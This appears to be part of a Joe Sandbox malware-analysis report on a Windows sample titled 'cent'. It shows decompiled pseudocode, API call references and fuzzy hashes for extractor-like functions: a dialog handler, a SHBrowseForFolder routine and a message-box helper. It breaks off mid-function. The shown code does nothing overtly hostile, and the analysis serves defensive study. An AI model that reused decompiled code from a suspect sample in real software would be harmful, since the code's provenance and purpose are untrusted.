                                                                                                                                                                                                      • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                      • API String ID: 1002816675-2654900392
                                                                                                                                                                                                      • Opcode ID: 7c709e1d57dd79ca081a621a88a49f5d9873eb2d427e4d927dc33fdaf66cb52a
                                                                                                                                                                                                      • Instruction ID: e3d46be0c62d61c6bce36581f94cd837dfaf68d05d14644f6f2b521af0352a8d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c709e1d57dd79ca081a621a88a49f5d9873eb2d427e4d927dc33fdaf66cb52a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC51E5B0340701ABE760E7B09D5AB7B2ABDEB65740F144539F942D61D1DBF98C82CB21
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                                                                      			E00A634F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                      				struct HWND__* _t35;
                                                                                                                                                                                                      				struct HWND__* _t38;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t9 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t9 == 0) {
                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					 *0xa691d8 = 1;
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					_push(_a4);
                                                                                                                                                                                                      					L21:
                                                                                                                                                                                                      					EndDialog();
                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				_pop(1);
                                                                                                                                                                                                      				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                      				if(_t12 == 0) {
                                                                                                                                                                                                      					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                      					if(_a12 != 0x1b) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L19;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t13 = _t12 - 0xe;
                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                      					_t35 = _a4;
                                                                                                                                                                                                      					 *0xa68584 = _t35;
                                                                                                                                                                                                      					E00A643D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                      					__eflags =  *0xa68184; // 0x1
                                                                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                      					_t17 = CreateThread(0, 0, E00A64FE0, 0, 0, 0xa68798);
                                                                                                                                                                                                      					 *0xa6879c = _t17;
                                                                                                                                                                                                      					__eflags = _t17;
                                                                                                                                                                                                      					if(_t17 != 0) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						E00A644B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(_t35);
                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t23 = _t13 - 1;
                                                                                                                                                                                                      				if(_t23 == 0) {
                                                                                                                                                                                                      					__eflags = _a12 - 2;
                                                                                                                                                                                                      					if(_a12 != 2) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					ResetEvent( *0xa6858c);
                                                                                                                                                                                                      					_t38 =  *0xa68584; // 0x0
                                                                                                                                                                                                      					_t25 = E00A644B9(_t38, 0x4b2, 0xa61140, 0, 0x20, 4);
                                                                                                                                                                                                      					__eflags = _t25 - 6;
                                                                                                                                                                                                      					if(_t25 == 6) {
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						 *0xa691d8 = 1;
                                                                                                                                                                                                      						SetEvent( *0xa6858c);
                                                                                                                                                                                                      						_t39 =  *0xa6879c; // 0x0
                                                                                                                                                                                                      						E00A63680(_t39);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t25 - 1;
                                                                                                                                                                                                      					if(_t25 == 1) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetEvent( *0xa6858c);
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t23 == 0xe90) {
                                                                                                                                                                                                      					TerminateThread( *0xa6879c, 0);
                                                                                                                                                                                                      					EndDialog(_a4, _a12);
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      0x00a634fb
                                                                                                                                                                                                      0x00a634fe
                                                                                                                                                                                                      0x00a63665
                                                                                                                                                                                                      0x00a63666
                                                                                                                                                                                                      0x00a63666
                                                                                                                                                                                                      0x00a63668
                                                                                                                                                                                                      0x00a6366e
                                                                                                                                                                                                      0x00a6366e
                                                                                                                                                                                                      0x00a63671
                                                                                                                                                                                                      0x00a63671
                                                                                                                                                                                                      0x00a63677
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63677
                                                                                                                                                                                                      0x00a63504
                                                                                                                                                                                                      0x00a63506
                                                                                                                                                                                                      0x00a63507
                                                                                                                                                                                                      0x00a6350c
                                                                                                                                                                                                      0x00a6365b
                                                                                                                                                                                                      0x00a6365f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63661
                                                                                                                                                                                                      0x00a63512
                                                                                                                                                                                                      0x00a63515
                                                                                                                                                                                                      0x00a635be
                                                                                                                                                                                                      0x00a635c1
                                                                                                                                                                                                      0x00a635d1
                                                                                                                                                                                                      0x00a635d8
                                                                                                                                                                                                      0x00a635de
                                                                                                                                                                                                      0x00a635f8
                                                                                                                                                                                                      0x00a63617
                                                                                                                                                                                                      0x00a63617
                                                                                                                                                                                                      0x00a63623
                                                                                                                                                                                                      0x00a63637
                                                                                                                                                                                                      0x00a6363d
                                                                                                                                                                                                      0x00a63642
                                                                                                                                                                                                      0x00a63644
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63646
                                                                                                                                                                                                      0x00a63652
                                                                                                                                                                                                      0x00a63657
                                                                                                                                                                                                      0x00a63658
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63658
                                                                                                                                                                                                      0x00a63644
                                                                                                                                                                                                      0x00a6351b
                                                                                                                                                                                                      0x00a6351d
                                                                                                                                                                                                      0x00a6354f
                                                                                                                                                                                                      0x00a63553
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6355f
                                                                                                                                                                                                      0x00a63565
                                                                                                                                                                                                      0x00a6357c
                                                                                                                                                                                                      0x00a63581
                                                                                                                                                                                                      0x00a63584
                                                                                                                                                                                                      0x00a6359b
                                                                                                                                                                                                      0x00a635a1
                                                                                                                                                                                                      0x00a635a7
                                                                                                                                                                                                      0x00a635ad
                                                                                                                                                                                                      0x00a635b3
                                                                                                                                                                                                      0x00a635b8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a635b8
                                                                                                                                                                                                      0x00a63586
                                                                                                                                                                                                      0x00a63588
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63590
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63590
                                                                                                                                                                                                      0x00a63524
                                                                                                                                                                                                      0x00a63535
                                                                                                                                                                                                      0x00a63541
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63549
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • TerminateThread.KERNEL32(00000000), ref: 00A63535
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00A63541
                                                                                                                                                                                                      • ResetEvent.KERNEL32 ref: 00A6355F
                                                                                                                                                                                                      • SetEvent.KERNEL32(00A61140,00000000,00000020,00000004), ref: 00A63590
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00A635C7
                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 00A635F1
                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 00A635F8
                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 00A63610
                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 00A63617
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 00A63623
                                                                                                                                                                                                      • CreateThread.KERNEL32 ref: 00A63637
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 00A63671
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 2406144884-3940384054
                                                                                                                                                                                                      • Opcode ID: 10248e48ee0e245e9c0fa3b30a977adec7d593b747ed45e40a29869f06dab5b0
                                                                                                                                                                                                      • Instruction ID: 6e9055b9d29edbb78e7ab49e6c6e1df82cee30db2ac884a68c8e809ca2807eb7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10248e48ee0e245e9c0fa3b30a977adec7d593b747ed45e40a29869f06dab5b0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4231B376240300BBDF219FB5EC4DE2B3A79E796B01F104619F613A62B0CBB58903CE51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                                                                      			E00A64224(char __ecx) {
                                                                                                                                                                                                      				char* _v8;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                      				char* _v28;
                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                      				char _v44;
                                                                                                                                                                                                      				char _v48;
                                                                                                                                                                                                      				char _v52;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                      				char* _t61;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				char* _t65;
                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                      				void* _t71;
                                                                                                                                                                                                      				char _t76;
                                                                                                                                                                                                      				intOrPtr _t85;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t67 = __ecx;
                                                                                                                                                                                                      				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                      				if(_t66 == 0) {
                                                                                                                                                                                                      					_t63 = 0x4c2;
                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                      					E00A644B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                      				_v12 = _t26;
                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                      					_t63 = 0x4c1;
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                      				_v20 = _t28;
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                      				_v16 = _t29;
                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t76 =  *0xa688c0; // 0x0
                                                                                                                                                                                                      				if(_t76 != 0) {
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					 *0xa687a0 = 0;
                                                                                                                                                                                                      					_v52 = _t67;
                                                                                                                                                                                                      					_v48 = 0;
                                                                                                                                                                                                      					_v44 = 0;
                                                                                                                                                                                                      					_v40 = 0xa68598;
                                                                                                                                                                                                      					_v36 = 1;
                                                                                                                                                                                                      					_v32 = E00A64200;
                                                                                                                                                                                                      					_v28 = 0xa688c0;
                                                                                                                                                                                                      					 *0xa6a288( &_v52);
                                                                                                                                                                                                      					_t32 =  *_v12();
                                                                                                                                                                                                      					if(_t71 != _t71) {
                                                                                                                                                                                                      						asm("int 0x29");
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_v12 = _t32;
                                                                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                                                                      						 *0xa6a288(_t32, 0xa688c0);
                                                                                                                                                                                                      						 *_v16();
                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if( *0xa688c0 != 0) {
                                                                                                                                                                                                      							E00A61680(0xa687a0, 0x104, 0xa688c0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xa6a288(_v12);
                                                                                                                                                                                                      						 *_v20();
                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                      					_t85 =  *0xa687a0; // 0x0
                                                                                                                                                                                                      					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					GetTempPathA(0x104, 0xa688c0);
                                                                                                                                                                                                      					_t61 = 0xa688c0;
                                                                                                                                                                                                      					_t4 =  &(_t61[1]); // 0xa688c1
                                                                                                                                                                                                      					_t65 = _t4;
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t42 =  *_t61;
                                                                                                                                                                                                      						_t61 =  &(_t61[1]);
                                                                                                                                                                                                      					} while (_t42 != 0);
                                                                                                                                                                                                      					_t5 = _t61 - _t65 + 0xa688c0; // 0x14d1181
                                                                                                                                                                                                      					_t44 = CharPrevA(0xa688c0, _t5);
                                                                                                                                                                                                      					_v8 = _t44;
                                                                                                                                                                                                      					if( *_t44 == 0x5c &&  *(CharPrevA(0xa688c0, _t44)) != 0x3a) {
                                                                                                                                                                                                      						 *_v8 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}




























                                                                                                                                                                                                      0x00a64234
                                                                                                                                                                                                      0x00a6423c
                                                                                                                                                                                                      0x00a64240
                                                                                                                                                                                                      0x00a643b2
                                                                                                                                                                                                      0x00a643b7
                                                                                                                                                                                                      0x00a643c0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a643c5
                                                                                                                                                                                                      0x00a6424c
                                                                                                                                                                                                      0x00a64252
                                                                                                                                                                                                      0x00a64257
                                                                                                                                                                                                      0x00a643a4
                                                                                                                                                                                                      0x00a643a5
                                                                                                                                                                                                      0x00a643ab
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a643ab
                                                                                                                                                                                                      0x00a64263
                                                                                                                                                                                                      0x00a64269
                                                                                                                                                                                                      0x00a6426e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6427a
                                                                                                                                                                                                      0x00a64280
                                                                                                                                                                                                      0x00a64285
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6428d
                                                                                                                                                                                                      0x00a64293
                                                                                                                                                                                                      0x00a642e6
                                                                                                                                                                                                      0x00a642e9
                                                                                                                                                                                                      0x00a642ef
                                                                                                                                                                                                      0x00a642f4
                                                                                                                                                                                                      0x00a642f7
                                                                                                                                                                                                      0x00a64300
                                                                                                                                                                                                      0x00a64307
                                                                                                                                                                                                      0x00a6430e
                                                                                                                                                                                                      0x00a64315
                                                                                                                                                                                                      0x00a6431c
                                                                                                                                                                                                      0x00a64322
                                                                                                                                                                                                      0x00a64326
                                                                                                                                                                                                      0x00a6432d
                                                                                                                                                                                                      0x00a6432d
                                                                                                                                                                                                      0x00a6432f
                                                                                                                                                                                                      0x00a64334
                                                                                                                                                                                                      0x00a64343
                                                                                                                                                                                                      0x00a64349
                                                                                                                                                                                                      0x00a6434d
                                                                                                                                                                                                      0x00a64354
                                                                                                                                                                                                      0x00a64354
                                                                                                                                                                                                      0x00a6435d
                                                                                                                                                                                                      0x00a6436e
                                                                                                                                                                                                      0x00a6436e
                                                                                                                                                                                                      0x00a6437d
                                                                                                                                                                                                      0x00a64383
                                                                                                                                                                                                      0x00a64387
                                                                                                                                                                                                      0x00a6438e
                                                                                                                                                                                                      0x00a6438e
                                                                                                                                                                                                      0x00a64387
                                                                                                                                                                                                      0x00a64391
                                                                                                                                                                                                      0x00a64399
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64295
                                                                                                                                                                                                      0x00a6429f
                                                                                                                                                                                                      0x00a642a5
                                                                                                                                                                                                      0x00a642aa
                                                                                                                                                                                                      0x00a642aa
                                                                                                                                                                                                      0x00a642ad
                                                                                                                                                                                                      0x00a642ad
                                                                                                                                                                                                      0x00a642af
                                                                                                                                                                                                      0x00a642b0
                                                                                                                                                                                                      0x00a642b6
                                                                                                                                                                                                      0x00a642c2
                                                                                                                                                                                                      0x00a642c8
                                                                                                                                                                                                      0x00a642ce
                                                                                                                                                                                                      0x00a642e4
                                                                                                                                                                                                      0x00a642e4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a642ce

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00A64236
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00A6424C
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00A64263
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00A6427A
                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,00A688C0,?,00000001), ref: 00A6429F
                                                                                                                                                                                                      • CharPrevA.USER32(00A688C0,014D1181,?,00000001), ref: 00A642C2
                                                                                                                                                                                                      • CharPrevA.USER32(00A688C0,00000000,?,00000001), ref: 00A642D6
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A64391
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A643A5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                      • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                      • API String ID: 1865808269-1731843650
                                                                                                                                                                                                      • Opcode ID: 23d1f8eef74d7b376a5f3cb803c60423c84101cb9eba078a1e68dbecd567add8
                                                                                                                                                                                                      • Instruction ID: 21ed62255e3527023d60f6e6b48921aebdfc7ea71d688c58900c22bbef50c2ad
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23d1f8eef74d7b376a5f3cb803c60423c84101cb9eba078a1e68dbecd567add8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21411CB4A00304AFD711EFB4DC949AE7BB8FB59384F140669E941A7351CFB88C42CB61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00A644B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v64;
                                                                                                                                                                                                      				char _v576;
                                                                                                                                                                                                      				void* _v580;
                                                                                                                                                                                                      				struct HWND__* _v584;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t34;
                                                                                                                                                                                                      				void* _t37;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                      				signed int _t52;
                                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                                      				intOrPtr _t55;
                                                                                                                                                                                                      				intOrPtr _t58;
                                                                                                                                                                                                      				intOrPtr _t59;
                                                                                                                                                                                                      				int _t64;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				intOrPtr* _t67;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      				intOrPtr* _t73;
                                                                                                                                                                                                      				intOrPtr* _t76;
                                                                                                                                                                                                      				intOrPtr* _t77;
                                                                                                                                                                                                      				void* _t80;
                                                                                                                                                                                                      				void* _t81;
                                                                                                                                                                                                      				void* _t82;
                                                                                                                                                                                                      				intOrPtr* _t84;
                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                      				signed int _t89;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t75 = __edx;
                                                                                                                                                                                                      				_t34 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                      				_v584 = __ecx;
                                                                                                                                                                                                      				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                      				_t67 = _a4;
                                                                                                                                                                                                      				_t69 = 0xd;
                                                                                                                                                                                                      				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                      				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                      				_v580 = _t37;
                                                                                                                                                                                                      				asm("movsb");
                                                                                                                                                                                                      				if(( *0xa68a38 & 0x00000001) != 0) {
                                                                                                                                                                                                      					_t39 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_v576 = 0;
                                                                                                                                                                                                      					LoadStringA( *0xa69a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                      					if(_v576 != 0) {
                                                                                                                                                                                                      						_t73 =  &_v576;
                                                                                                                                                                                                      						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                      						_t75 = _t16;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t43 =  *_t73;
                                                                                                                                                                                                      							_t73 = _t73 + 1;
                                                                                                                                                                                                      						} while (_t43 != 0);
                                                                                                                                                                                                      						_t84 = _v580;
                                                                                                                                                                                                      						_t74 = _t73 - _t75;
                                                                                                                                                                                                      						if(_t84 == 0) {
                                                                                                                                                                                                      							if(_t67 == 0) {
                                                                                                                                                                                                      								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                      								_t83 = _t27;
                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t75 = _t83;
                                                                                                                                                                                                      									_t74 = _t80;
                                                                                                                                                                                                      									E00A61680(_t80, _t83,  &_v576);
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t76 = _t67;
                                                                                                                                                                                                      								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                      								_t85 = _t24;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t55 =  *_t76;
                                                                                                                                                                                                      									_t76 = _t76 + 1;
                                                                                                                                                                                                      								} while (_t55 != 0);
                                                                                                                                                                                                      								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                      								_t83 = _t25 + _t74;
                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E00A6171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t77 = _t67;
                                                                                                                                                                                                      							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                      							_t81 = _t18;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t58 =  *_t77;
                                                                                                                                                                                                      								_t77 = _t77 + 1;
                                                                                                                                                                                                      							} while (_t58 != 0);
                                                                                                                                                                                                      							_t75 = _t77 - _t81;
                                                                                                                                                                                                      							_t82 = _t84 + 1;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t59 =  *_t84;
                                                                                                                                                                                                      								_t84 = _t84 + 1;
                                                                                                                                                                                                      							} while (_t59 != 0);
                                                                                                                                                                                                      							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                      							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                      							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                      							_t80 = _t44;
                                                                                                                                                                                                      							if(_t80 == 0) {
                                                                                                                                                                                                      								goto L6;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_push(_v580);
                                                                                                                                                                                                      								E00A6171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                      								L23:
                                                                                                                                                                                                      								MessageBeep(_a12);
                                                                                                                                                                                                      								if(E00A6681F(_t67) == 0) {
                                                                                                                                                                                                      									L25:
                                                                                                                                                                                                      									_t49 = 0x10000;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t54 = E00A667C9(_t74, _t74);
                                                                                                                                                                                                      									_t49 = 0x190000;
                                                                                                                                                                                                      									if(_t54 == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16);
                                                                                                                                                                                                      								_t83 = _t52;
                                                                                                                                                                                                      								LocalFree(_t80);
                                                                                                                                                                                                      								_t39 = _t52;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
